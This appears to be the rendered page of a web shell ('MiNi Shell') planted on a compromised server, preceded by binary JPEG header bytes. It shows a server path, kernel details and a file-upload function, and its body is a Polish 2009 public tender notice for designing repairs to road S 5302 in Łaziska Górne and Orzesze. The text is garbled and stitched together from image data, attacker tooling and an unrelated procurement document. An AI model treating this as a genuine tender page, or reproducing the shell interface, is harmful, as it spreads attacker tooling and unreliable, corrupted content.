JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090227/44002-N-2009.html

<p class="kh_header"><b>Łaziska Górne: OPRACOWANIE PROJEKTU REMONTU CIĄGU DROGOWEGO NR S 5302 -                                   UL. ŚW. WAWRZYŃCA W ORZESZU ORAZ UL. BRADA W ŁAZISKACH GÓRNYCH WRAZ Z PRZEBUDOWĄ WYBRANYCH ELEMENTÓW PASA DROGOWEGO, W TYM ZMIANĄ ORGANIZACJI RUCHU NA ODCINKU OD SKRZYŻOWANIA  Z UL. PRZYSIÓŁKI DO UL. PARKOWEJ</b><br>
<b>Numer ogłoszenia: 44002 - 2009; data zamieszczenia: 27.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Mikołowie z/s w Łaziskach Górnych , ul. Chopina 8, 43-170 Łaziska Górne, woj. śląskie, tel. 032 2244499, 2244516, faks 032 2244499 w. 226.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pzd.mikolow.bipgov.info.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE PROJEKTU REMONTU CIĄGU DROGOWEGO NR S 5302 -                                   UL. ŚW. WAWRZYŃCA W ORZESZU ORAZ UL. BRADA W ŁAZISKACH GÓRNYCH WRAZ Z PRZEBUDOWĄ WYBRANYCH ELEMENTÓW PASA DROGOWEGO, W TYM ZMIANĄ ORGANIZACJI RUCHU NA ODCINKU OD SKRZYŻOWANIA  Z UL. PRZYSIÓŁKI DO UL. PARKOWEJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowej remontu ciągu drogowego nr S 5302. Opracowanie powinno obejmować między innymi uregulowanie szerokości jezdni na całej długości objętej opracowaniem tj. od skrzyżowania z ul. Przysiółki do skrzyżowania  z ul. Parkową włącznie. 
Przewidzieć należy wymianę zniszczonej nawierzchni chodnika przy ul. Brada w Łaziskach Górnych oraz przełożenie istniejącego chodnika przy ul. Św. Wawrzyńca w Orzeszu celem dostosowania do nowego profilu drogi z wymianą uszkodzonych elementów.  Nawierzchnia chodników z kostki betonowej grubość 8 cm behaton. Ująć należy niezbędną regulację z wymianą nawierzchni zjazdów po obu stronach drogi. Zamawiający dopuszcza zastosowanie odgięć osi drogi, wyspy kanalizujące ruch.
W pracach projektowych przewidzieć remont nawierzchni jezdni na całej zaprojektowanej (nowej) szerokości z dostosowaniem nośności do 100 kN/oś oraz kategorii ruchu KR 3. W opracowaniu należy wykorzystać opracowanie koncepcyjne przebudowy dróg będące w posiadaniu Powiatowego Zarządu Dróg. Zadanie należy wykonać w podziale na etapy robót, odrębnie kosztorysowane  w uzgodnieniu z Zamawiającym. Należy przewidzieć pozyskanie podkładów geodezyjnych, ich aktualizację do celów projektowych oraz przeprowadzenie niezbędnych pomiarów i uzyskanie wymaganych przepisami prawa uzgodnień oraz dokumentów pozwalających na przystąpienie do robót. 
Dokumentacja powinna obejmować także projekt organizacji ruchu na czas prowadzenia robót w pasie drogowym oraz docelowej organizacji ruchu.
Zamówienie należy wykonać zgodnie następującymi przepisami:
- Rozporządzenie Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2004 r. Nr 202, poz. 2072) oraz Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. z 2004 r. Nr 130, poz. 1389). 
- Rozporządzenie Ministra Infrastruktury z dnia 23 września 2003 r. w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzaniem (Dz. U. Nr 177, poz. 1729).
- Rozporządzenie Ministra Transportu i Gospodarki Morskiej  z dnia 02 marca 1999 r. w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. Nr 43 poz. 430).
STAN ISTNIEJĄCY; Kategoria, przeznaczenie (funkcja) ulicy: droga powiatowa o charakterze zbiorczym
Droga nr S5302 na terenie miast: Łaziska Górne - ul. Brada oraz Orzesze - ul. Św. Wawrzyńca, woj. śląskie
2. Charakterystyka przebiegu ulicy na odcinku objętym dokumentacją:
2.1 Początek (km 7 + 140,00 przyjęty zgodnie z opracowaniem koncepcyjnym): obręb skrzyżowania z ul. Przysiółki w Łaziskach Górnych
2.2  Koniec ul. Brada - granica z miastem Orzesze - (km 7 + 750,00)
2.3 Początek ul. Św. Wawrzyńca - granica z miastem Łaziska Górne - (km 7 + 750,00)
2.3 Koniec opracowania (km 9 + 210,00 m) - za skrzyżowaniem z ul. Parkową
2.4 Trasa ulicy (pasa terenu) przebiega po gruntach, działkach (własność gruntów) przynależnych do pasa drogowego drogi powiatowej.
3. Długość projektowanego odcinka ciągu drogowego:   ok. 2070 mb 
(Łaziska Górne - ul. Brada - 610 mb, Orzesze - ul. Św. Wawrzyńca - 1460 mb)

WYTYCZNE I DANE DO PROJEKTOWANIA
PRZEWIDYWANY ZAKRES PRAC: ODCINEK UL. BRADA W ŁAZISKACH GÓRNYCH - KM 7 + 140,00 - KM 7 + 750,00:
 - uregulowanie szerokości jezdni ok. 6,0 m, w nawiązaniu do istniejącego opracowania dokumentacji projektowej przebudowy skrzyżowania ulic: Brada, Prądna, Przysiółki.
- wymiana zniszczonej nawierzchni chodników z uporządkowaniem przebiegu i poszerzeniem średnio do 2,0 m po prawej stronie w kierunku Orzesza, 
- wykonanie nowego chodnika na szerokość średnio 1,5 m po lewej stronie w kierunku Orzesza,
- uporządkowanie i uzupełnienie wpustów deszczowych dla poprawy odwodnienia,
- sprawdzenie drożności istniejącej kanalizacji deszczowej wraz z zaleceniami ewentualnej naprawy,
- korekty geometrii skrzyżowań (łuków),
- sprawdzenie istniejącej konstrukcji i dostosowanie konstrukcji do wytrzymałości na obciążenia od pojazdów co najmniej 100 KN/os pojazdu,
- nowa nawierzchnia jezdni (nawierzchnia asfaltowa o zwiększonej odporności na koleinowanie i zmęczenie),
- przebudowa istniejących zatok autobusowych w obrębie granicy z miastem Orzesze ,
- elementy wymuszające uspokojenie ruchu w obrębie zatok autobusowych w tym przejście dla pieszych,

PRZEWIDYWANY ZAKRES PRAC: ODCINEK UL. ŚW. WAWRZYŃCA  W ORZESZU -  KM 7 + 750,00 - KM 8 + 994,00 (obręb skrzyżowania z ul. Partyzantów):
- uregulowanie szerokości jezdni ok. 5,7 m, 
- wykonanie nowego chodnika na szerokość średnio 2,0 m po lewej stronie w kierunku centrum Orzesza na odcinku od ul. Sikorskiego (droga gminna) do ul. Partyzantów,
- uporządkowanie odwodnienia poprzez uregulowanie przebiegu rowów przydrożnych,
- sprawdzenie istniejącej konstrukcji i dostosowanie konstrukcji do wytrzymałości na obciążenia od pojazdów co najmniej 100 KN/os pojazdu,
- nowa nawierzchnia jezdni (nawierzchnia asfaltowa o zwiększonej odporności na koleinowanie i zmęczenie),
- utwardzone obustronnie pobocza szerokości 1,0 m (tłuczniowe),
- przebudowa istniejącej zatoki autobusowej w obrębie skrzyżowania z ul. Partyzantów, 

PRZEWIDYWANY ZAKRES PRAC: ODCINEK UL. ŚW. WAWRZYŃCA                         W ORZESZU -  KM 8 + 994,00 - KM 9 + 210,00 (koniec opracowania):
- uregulowanie szerokości jezdni ok. 6,0 m, 
- przełożenie istniejącego chodnika celem dostosowania do nowego profilu drogi z wymianą uszkodzonych elementów,
- korekta tarczy skrzyżowania ul. Św. Wawrzyńca i ul. Partyzantów poprzez wykonanie wysp kanalizujących ruch,
- uporządkowanie odwodnienia po stronie prawej w kierunku centrum Orzesza (np. wykonanie nowej kanalizacji deszczowej wraz  z wpustami deszczowymi z jednoczesnym wskazaniem odbiornika w obrębie ul. Partyzantów - ciek / rów umocniony do istniejącego przepustu pod                 ul. Partyzantów),
- sprawdzenie istniejącej konstrukcji i dostosowanie konstrukcji do wytrzymałości na obciążenia od pojazdów co najmniej 100 KN/os pojazdu,
- nowa nawierzchnia jezdni (nawierzchnia asfaltowa o zwiększonej odporności na koleinowanie i zmęczenie),
- utwardzone pobocze szerokości 1,0 m (z kostki betonowej gr. 8 cm)

WYMAGANIA DOTYCZĄCE KOMPLETNOŚCI DOKUMENTACJI PROJEKTOWEJ:
a/  Zakres opracowania projektu obejmuje: 
opis techniczny (dane ogólne, opis rozwiązań projektowych), 
dokumentację rysunkową w podziale na etapy robót
przedmiar robót i kosztorys inwestorski w podziale na etapy robót
specyfikację techniczną wykonania i odbioru robót,
projekt organizacji ruchu docelowej jak i na czas realizacji robót, 
kompletne uzgodnienia wymagane przepisami prawa budowlanego oraz prawa ochrony środowiska,  

b/  Realizacja zamówienia następować będzie w uzgodnieniu z Zamawiającym oraz przy  udostępnieniu przez  Zamawiającego ogółu materiałów posiadanych w przedmiotowej  sprawie.
c/ Projektant będzie zobowiązany konsultować prace projektowe z zamawiającym na spotkaniach organizowanych średnio co dwa tygodnie, przez zamawiającego.
d/  Wykonawca dostarczy Zamawiającemu każdy projekt w formie papierowej w 5 egzemplarzach +                      
2 egzemplarze kosztorysu  inwestorskiego oraz w formie elektronicznej  1 egzemplarz (na płytach CD).
e/  Dokumentację w wersji elektronicznej należy wykonać w formacie umożliwiającym odczyt plików i ich wydruk w programach : AutoCAD 2000, Corel Draw (rysunki techniczne), Microsoft Word 2000 (pliki tekstowe), Microsoft Excel 2000 (pliki arkuszy kalkulacyjnych). Występujące inne pliki graficzne należy opracować w popularnych formatach takich jak: *.bmp, *.gif, *.jpg, itp. Natomiast przedmiary robót, kosztorysy należy wykonać w jednym z popularnych programów kosztorysowych  np. EDBUD, NORMA lub w formacie *.ath (wersja 3.00). Dokumenty należy przekazać w formie plików bez zabezpieczenia kodem..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> o zamówienie mogą ubiegać się wykonawcy, którzy spełniają następujące warunki:
a)	posiadają uprawnienia do wykonywania działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
b)	zrealizowali, współrealizowali bądź uczestniczyli w realizacji w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie niniejszego zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 zamówieniach na usługi  zbliżone co do zakresu niniejszego zamówienia oraz  o wartości nie mniejszej niż  100 000zł (brutto)
c)	przy wykonywanych pracach będą dysponować pracownikiem z co najmniej 3 - letnim doświadczeniem i uprawnieniami projektowymi;
d)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
e)	nie podlegają wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. z 2007r. Nr 223, poz.1655 z późniejszymi zmianami),
f)	spełniają warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. z 2007r. Nr 223, poz.1655 z późniejszymi zmianami),
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, (druk ZP-17) w oparciu o informacje zawarte w dokumentach i oświadczeniach. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a)	wypełniony i podpisany formularz ofertowy wraz z oświadczeniami z art. 22 ust. 1 ustawy prawo zamówień publicznych                           
b)	aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej; wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
Uwaga! Z dokumentu określonego w pkt.  b) musi wynikać zakres działalności oferenta, sposób reprezentacji oferenta, osoby które są uprawnione do reprezentowania oferenta na zewnątrz oraz składania oświadczeń woli w jego imieniu. W przypadku gdy nie wynika to z dokumentu załączonego do oferty i określonego w pkt.  b), należy dołączyć również do oferty statut, uchwałę lub inny dokument 
c)	w przypadku ustanowienia pełnomocników do reprezentowania firmy na zewnątrz i zaciągania zobowiązań w wysokości odpowiadającej cenie oferty, należy przedstawić dokument stwierdzający niniejsze pełnomocnictwo, tj.: pełnomocnictwo, umowę lub uchwałę, wskazującą osobę upoważnioną oraz zakres jej pełnomocnictwa;  
d)	wykaz wykonanych przez Wykonawcę usług  w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, zbliżonych co do zakresu niniejszego postępowania i o wartości  nie mniejszej niż 100 000zł co najmniej 2 usługi wypełnić druk nr 3
e)	dokumenty potwierdzające, że usługi opisane w wykazie wykonanych usług wykonane zostały               z należytą starannością.
f)	wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności; - (na zał. nr 4)
Uwaga! minimum 1 osoba z co najmniej 3 letnim doświadczeniem i uprawnieniami projektowymi,  dołączyć kopie uprawnień oraz zaświadczenie o aktualnej przynależności do Okręgowej Izby Inżynierów Budownictwa
g) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania w poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów, o których mowa w ppkt. b, składa dokument lub dokumenty,
  wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
  - nie otwarto jego likwidacji ani nie ogłoszono upadłości,
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
Uwaga: powyższe dokumenty powinny być wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert.
h) Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ppkt. i - zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://pzd.mikolow.bipgov.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacje Istotnych Warunków Zamówienia można uzyskać pod adresem: 
43-170 Łaziska Górne ul. Chopina 8, kancelaria PZD, osobiście lub za zaliczeniem pocztowym, 5,00zł. + koszt wysyłki.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2009 godzina 09:00, miejsce: kancelaria w siedzibie Zamawiającego Łaziska Górne ul. Chopina 8.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 08.04.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com